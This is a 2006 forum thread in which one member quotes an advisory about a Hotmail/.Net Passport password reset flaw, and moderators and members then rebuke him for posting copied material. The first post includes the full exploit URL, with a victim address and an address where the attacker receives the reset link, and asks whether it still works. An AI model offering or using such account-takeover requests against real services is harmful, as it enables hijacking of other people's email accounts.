Password Reset Vulnerability - Free Web Hosting

Welcome Guest ( Log In | Register )

Free Web Hosting » Computers & Tech » Security issues & Exploits


	Web Hosting

Password Reset Vulnerability

Options

me-here View Member Profile	Apr 22 2006, 10:19 AM Post #1
Newbie [ Level 1 ] Group: Members Posts: 7 Joined: 22-April 06 Member No.: 12,929	is it working now...? QUOTE An attacker can reset any Microsoft Hotmail/.Net Passport user account with no prior information like state, zip, country, answer to the secret question and the old password. Normally, a user has to answer the security questions and than answer the secret question if he wants to reset his password. By exploiting this vulnerability, an attacker can submit a specially crafted URL to get the password reset instructions and reset any user?s password. TECHNICAL DETAILS Due to the nature of this vulnerability and the fact that there is no fix available yet, no technical details are being made available with this advisory. Full technical details will be made available on our website once the vulnerability is fixed by Microsoft. Please note that we were forced to release this information public as these vulnerabilities are actively being exploited in the wild and are one of the most severe vulnerabilities ever found in Microsoft Hotmail/.Net Passport. The flaw is exploited by opening the following URL in a web browser: https://register.passport.net/emailpwdreset.srf?lc=1033 &em=victim@hotmail.com&id=&cb=&prefem=where-to@send-the-email.com&rst= after that, URL which resets the password will be delivered, in this case, to where-to@send-the-email.com. This post has been edited by me-here: Apr 22 2006, 10:27 AM

miCRoSCoPiC^eaRt... miCRoSCoPiC^eaRthLinG View Member Profile	Apr 22 2006, 01:15 PM Post #2
PsYcheDeLiC dR3aMeR Group: Admin Posts: 2,242 Joined: 29-January 05 From: Nakorn Chaisri, Thailand Member No.: 2,411 myCENTs:84.36	For Gods sake, try and provide SOME ORIGINAL INPUT ON YOUR OWN PART. I'm getting tired of warning you and deleting such posts. Don't you have any goddamned opinion on anything on your own? Or do you simply specialize is posting quoted material from other sites?

jlhaslip View Member Profile	Apr 22 2006, 10:49 PM Post #3
Advanced Member Group: Members Posts: 190 Joined: 15-November 05 From: Inland from the Left Coast of Canada Member No.: 9,627 myCENTs:91.54	O.o, never seen M^E this mad before. Musta really got under his skin...

Logan Deathbring... Logan Deathbringer View Member Profile	Apr 24 2006, 05:51 AM Post #4
Geek in-training Group: Members Posts: 301 Joined: 2-July 05 From: Washington State, USA, 3rd Rock from the Star Sol Member No.: 6,772	yes the ability to reset a password on the hotmail/msn network is possible, much like the quoted material you posted states. They are currently are working on, or have fixed, that problem already. As for how to do it, thats above my knowledge level, or to be more precise, not what I like to do for fun on my evenings off. As for the post...I have to agree with M^E, of the couple of posts of yours that I have run across they are, umm...Juvenile at best, or in my opinion just this side of spam. Please feel free to contribute to the community, I would love to see you become a strong member here, but please don't post like this anymore, otherwise M^E, Moonwitch, or another of the mods might decide that banning might be the best option.

« Next Oldest · Security issues & Exploits · Next Newest »

1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)

0 Members:

Display Mode: Standard · Switch to: Linear+ · Switch to: Outline

Track this topic · Email this topic · Print this topic · Subscribe to this forum

Similar Topics

Topic Title	Replies	Topic Starter	Views	Last Action
Windows (All Versions) "hacking" The Bios Password 12	13	Feelay	1,153	19th December 2008 - 03:43 AM Last post by: laniczech
Hosted Members Support Wrong Password/username - Fatal Error In Horde	5	derouge	1,536	30th November 2008 - 07:16 AM Last post by: iG-Rev.Keith Ratliff
Hardware Workshop Reset BIOS 12	13	rmdort	4,598	13th November 2008 - 10:31 AM Last post by: Atomic0
C, C++ & Visual C++ Password Function	0	khalilov	153	9th November 2008 - 11:10 AM Last post by: khalilov
Linux Enter Your Password To Perform Administrative Tasks	3	FirefoxRocks	330	12th September 2008 - 02:07 AM Last post by: xboxrulz
Web Design and HTML Password Protection	5	Mitch666Holland	427	26th August 2008 - 10:28 AM Last post by: yordan
Software Win Rar Password Problem	7	joe.k	2,482	19th August 2008 - 11:53 AM Last post by: Guest
Networking Cracking Wireless Access Point Password? 123	22	essential_clix	3,530	7th August 2008 - 09:27 PM Last post by: Guest
Hardware Workshop How To Erase Dell Inspiron Hard-drive Password	1	Emusic.SR.mN	1,640	28th July 2008 - 01:12 AM Last post by: Guest
Linux Opensuse: Stop Asking Root Password	5	wutske	632	26th June 2008 - 02:59 PM Last post by: wutske
PHP How To Reset The Server Variable Php_auth_user	9	TavoxPeru	2,206	19th May 2008 - 12:12 PM Last post by: iGuest
Security issues & Exploits How To Reset A Nt Password Using Knoppix-std	3	tansqrx	25,466	23rd April 2008 - 10:00 PM Last post by: tansqrx
Hosting Support & Help Account Reset	5	Quatrux	539	10th April 2008 - 03:07 AM Last post by: BuffaloHELP
Hosting Support & Help Forgot My Cpanel Password	7	kc8yff	3,124	22nd February 2008 - 12:49 AM Last post by: Jimmy89
Yahoo! Latest Yahoo! Vulnerability Appears To Be A Moving Target For Messenger	2	tansqrx	643	8th February 2008 - 09:32 PM Last post by: tansqrx

Lo-Fi Version

Time is now: 7th January 2009 - 11:49 PM